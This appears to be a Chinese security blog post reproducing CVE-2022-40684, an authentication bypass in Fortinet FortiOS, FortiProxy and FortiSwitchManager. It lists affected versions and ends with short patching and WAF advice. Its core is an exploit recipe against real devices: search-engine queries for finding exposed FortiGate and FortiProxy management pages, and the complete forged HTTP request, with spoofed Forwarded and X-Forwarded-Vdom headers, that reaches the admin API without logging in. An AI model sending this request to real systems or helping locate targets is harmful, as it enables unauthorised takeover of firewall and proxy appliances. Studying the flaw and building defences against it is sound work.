Fortinet(飞塔)身份验证绕过漏洞(CVE-2022-40684)复现
2022-11-15 11:16:39 Author: 银河护卫队super(查看原文) 阅读量:68 收藏

漏洞描述

Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。在受影响的FortiOS、FortiProxy 和 FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。

漏洞复现

一、资产搜索

title="FortiProxy“

title="FortiGate"

二、漏洞影响版本

FortiOS 版本 7.2.0 - 7.2.1

FortiOS 版本 7.0.0 - 7.0.6

FortiProxy 版本 7.2.0

FortiProxy 版本 7.0.0 - 7.0.6

FortiSwitchManager 版本 7.2.0

FortiSwitchManager 版本 7.0.0

三、漏洞复现

1.访问目标IP

2、修改参数并抓包

payload:GET /api/v2/cmdb/system/admin HTTP/1.1Host: 目标User-Agent: Node.jsAccept-Encoding: gzip, deflateAccept: */*Hosts: 127.0.0.1:9980Forwarded:by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=X-Forwarded-Vdom: root

四、修复建议

建议受影响的用户及时升级版本安装补丁由于User-Agent的值固定,Forwarded和X-Forwarded-Vdom存在,所以特征还是很明显的,设置WAF策略应该也是不容易绕过的

参考地址http://cn-sec.com/archives/1380917.htmlhttps://github.com/hughink/CVE-2022-40684

END

• 往期精选

windows提权总结

一次SSH爆破攻击haiduc工具的应急响应

记一次艰难的SQL注入(过安全狗)

记一次溯源

下方点击关注发现更多精彩


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwNzI0MTQzOA==&mid=2247492710&idx=1&sn=16802dafdab9197f1a223fb86a36dca1&chksm=c0de96d7f7a91fc198a55717a3db782e74be59b5b6d1bec05c0ca7218c3443a8a1085224feba#rd
如有侵权请联系:admin#unsafe.sh